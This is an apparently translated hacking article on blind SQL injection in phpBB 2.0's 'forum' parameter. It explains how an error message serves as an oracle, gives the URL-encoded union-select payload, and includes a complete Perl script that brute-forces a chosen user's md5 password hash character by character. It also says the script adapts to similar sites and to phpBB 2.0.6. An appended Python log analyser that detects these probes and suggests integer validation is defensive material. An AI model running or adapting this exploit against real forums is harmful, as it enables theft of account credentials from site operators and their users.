PHP Injection Example

It is hard to find a complete article with working code on PHP injection on the Internet, so I have spent several weeks chewing on MySQL and PHP. Let me share what I found, and I hope it draws some attention!
I believe everyone is already very familiar with ASP injection. Injecting PHP is harder than ASP, because the magic_quotes_gpc option of PHP is a real headache: no quotes can be used in the injection, and most PHP is combined with MySQL, whose limited feature set, seen from another angle, also blocks injection to some extent. I will give an example here, taking phpBB 2.0 as the case:
There is a variable in it that is not filtered:
if ( isset($HTTP_GET_VARS[POST_FORUM_URL]) || isset($HTTP_POST_VARS[POST_FORUM_URL]) )
{
    $forum_id = ( isset($HTTP_GET_VARS[POST_FORUM_URL]) ) ? intval($HTTP_GET_VARS[POST_FORUM_URL]) : intval($HTTP_POST_VARS[POST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']) )
{
    $forum_id = $HTTP_GET_VARS['forum'];
}
else
{
    $forum_id = '';
}
This is the forum parameter, and it is then placed directly into the query:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
If this were ASP, I believe many people would know how to inject it. If the forum specified by forum_id does not exist, $result will be empty, the 'Could not obtain forums information' message is returned, and the following code is never executed:
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id); /****************************************
The key is the line marked with asterisks. It calls the function session_pagestart($user_ip, $thispage_id), which is defined in the same file. Because the code is too long, I will not paste it here; if you are interested, take a look yourself. What matters is that this function in turn calls session_begin(). The call is session_begin($user_id, $user_ip, $thispage_id, TRUE), also defined in this file, with the following code:
$sql = "UPDATE " . SESSIONS_TABLE . "
    SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id, session_logged_in = $login
    WHERE session_id = '" . $session_id . "'
        AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) || !$db->sql_affectedrows() )
{
    $session_id = md5(uniqid($user_ip));
    $sql = "INSERT INTO " . SESSIONS_TABLE . "
        (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in)
        VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__, $sql);
    }
}
Here session_page is defined as an integer column in MySQL. Its value is $page_id, that is, $forum_id. If the value inserted is not an integer, MySQL reports an error and the 'Error creating new session : session_begin' prompt appears. So the value of $forum_id is what matters, and I specified it as: -1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57, with no quotes! Although the specified forum_id does not exist, the result returned by the query may still be non-empty. This guesses whether the ASCII value of the first character of the password of user_id 2 is 57. If it is, the $result in the first code block of this article is not empty, so the session_pagestart function runs. Since $forum_id is not an integer, that causes an error, so the page displays 'Error creating new session : session_begin', which means you guessed the first character; the other positions work the same way.
Without this error message I think it would be hard to tell whether the injection succeeded even when it did. It seems the error message is quite helpful. That is the end of the analysis. Here is a test script. With slight modification it can be applied to other similar cases of guessing md5 passwords. The match string is for the English version; for Chinese or other language packs, just change the string being matched.
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;
print " ***********************\n";
print " phpbb exp\n";
print " code by pinkeyes\n";
print " ";
print " ************************\n";
print "please enter the weak file's url:\n";
print ". http://192.168.1.4/phpBB2/";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack\n";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!\n";
@pink=(48..57);          # ASCII '0'..'9'
@pink=(@pink,97..102);   # ASCII 'a'..'f' (md5 hex digits)
for($j=1;$j<=32;$j++){
    for ($i=0;$i<@pink;$i++){
        $url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
        $request = HTTP::Request->new('GET', "$url");
        $response = $ua->request($request);
        if ($response->is_success) {
            if ($response->content =~ /Error creating new session/) {
                $pwd.=chr($pink[$i]);
                print "$pwd\n";
            }
        }
    }
}
if ($pwd ne ""){
    print "successfully,The password is $pwd,good luck\n";
}
else{
    print "bad luck,work failed!\n";
}
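As an added example from the defender's side (not part of the original article or of phpBB), the following Python script applies to web-server access logs the integer check that the unfiltered 'forum' branch above lacks, and flags requests matching the character-at-a-time error oracle the script above produces. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style log lines (not real traffic): two oracle probes
# against the forum parameter from one client, one legitimate request.
SAMPLE_LOG = """\
10.0.0.9 - - [12/Mar/2004:10:01:02 +0000] "GET /phpBB2/viewforum.php?forum=-1%20union%20select%201,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57 HTTP/1.0" 200 5120
10.0.0.9 - - [12/Mar/2004:10:01:03 +0000] "GET /phpBB2/viewforum.php?forum=-1%20union%20select%201,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,2,1))=97 HTTP/1.0" 200 5120
10.0.0.7 - - [12/Mar/2004:10:02:00 +0000] "GET /phpBB2/viewforum.php?forum=3 HTTP/1.0" 200 8811
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
# Signature of the oracle described in the article: a UNION combined with an
# ord(substring(column, position, 1)) = byte comparison.
PROBE_RE = re.compile(
    r"union\s+select.*?ord\(substring\((\w+),(\d+),1\)\)\s*=\s*(\d+)", re.I)

def is_valid_forum_id(value):
    """The check the vulnerable branch lacks: 'forum' must be a plain integer,
    i.e. something intval() would accept without silently truncating."""
    return re.fullmatch(r"-?\d+", value) is not None

def analyze_log(text):
    """Per client IP: how many non-integer forum values were sent, how many of
    them match the oracle signature, and which password positions were probed.
    Clients that only sent integer forum values are not reported."""
    hits = defaultdict(lambda: {"bad_forum": 0, "probes": 0, "positions": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs already percent-decodes the values, so no second decode.
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for forum in qs.get("forum", []):
            if is_valid_forum_id(forum):
                continue
            rec = hits[m["ip"]]
            rec["bad_forum"] += 1
            p = PROBE_RE.search(forum)
            if p:
                rec["probes"] += 1
                rec["positions"].add(int(p.group(2)))
    return {ip: {"bad_forum": r["bad_forum"], "probes": r["probes"],
                 "positions": sorted(r["positions"])} for ip, r in hits.items()}
```

A real run against the script above would show one client hammering 16 guesses per position across positions 1 to 32, which is the pattern worth alerting on; the application-side fix is simply to validate 'forum' the way the POST_FORUM_URL branch already does.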
As for the recent phpBB 2.0.6 issue, the program above only needs slight modification. If there are any errors, please correct me.